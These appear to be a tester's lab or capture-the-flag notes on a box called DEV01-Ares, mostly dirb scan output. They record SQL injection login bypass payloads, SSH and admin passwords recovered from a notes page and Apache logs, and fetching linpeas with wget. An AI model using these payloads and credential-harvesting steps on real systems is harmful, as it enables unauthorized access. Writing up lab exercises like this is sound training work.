['22', '80']
DEV01-Ares

found login page @ 10.10.110.45/login

ran dirb on http://10.10.110.45/
	found: /javascript, /login, /notes, /login/index.php, /javascript/jquery

ran zap against http://10.10.110.45
	found: SQL injection vuln
	logged in with: (' or '1' = '1)
		discovered we are logged in as user ADAM when trying to navigate to /notes
		discovered admin has access, therefore you can assume admin is a user 
	logged in with: (admin'-- -)
		discovered we are logged in as ADMIN
		navigated to /notes
		discovered SSH password L3ZBT6wvj5m6sP!x

SSH'd into 10.10.110.45 as adam with discovered password
	found flag: GENESIS{Y_N0_SQL?!?!}
	found: notes.txt
		- Purge Apache logs before release.
		- Find NoSQL alternative for database.
	navigated to cd /var/log/apache2
		found the following in access log
			- username=admin&password=$@#G34123421
			- username=admin&password=8NJxgU2CtVsJYZE5
		
deployed linpeas.sh with wget
	ran linpeas for enum nothing found
	

******COMMANDS******
	└─$ dirb http://10.10.110.45

	-----------------
	DIRB v2.22    
	By The Dark Raver
	-----------------

	START_TIME: Thu Feb 22 17:23:58 2024
	URL_BASE: http://10.10.110.45/
	WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

	-----------------

	GENERATED WORDS: 4612                                                          

	---- Scanning URL: http://10.10.110.45/ ----
	+ http://10.10.110.45/index.php (CODE:302|SIZE:0)                                                                     
	==> DIRECTORY: http://10.10.110.45/javascript/                                                                        
	==> DIRECTORY: http://10.10.110.45/login/                                                                             
	==> DIRECTORY: http://10.10.110.45/notes/                                                                             
	+ http://10.10.110.45/server-status (CODE:403|SIZE:277)                                                               
		                                                                                                              
	---- Entering directory: http://10.10.110.45/javascript/ ----
	==> DIRECTORY: http://10.10.110.45/javascript/jquery/                                                                 
		                                                                                                              
	---- Entering directory: http://10.10.110.45/login/ ----
	+ http://10.10.110.45/login/index.php (CODE:200|SIZE:750)                                                             
		                                                                                                              
	---- Entering directory: http://10.10.110.45/notes/ ----
	+ http://10.10.110.45/notes/index.php (CODE:302|SIZE:0)                                                               
		                                                                                                              
	---- Entering directory: http://10.10.110.45/javascript/jquery/ ----
	+ http://10.10.110.45/javascript/jquery/jquery (CODE:200|SIZE:288550)                                                 
		                                                                                                              
	-----------------
	END_TIME: Thu Feb 22 18:18:29 2024
	DOWNLOADED: 23060 - FOUND: 5   
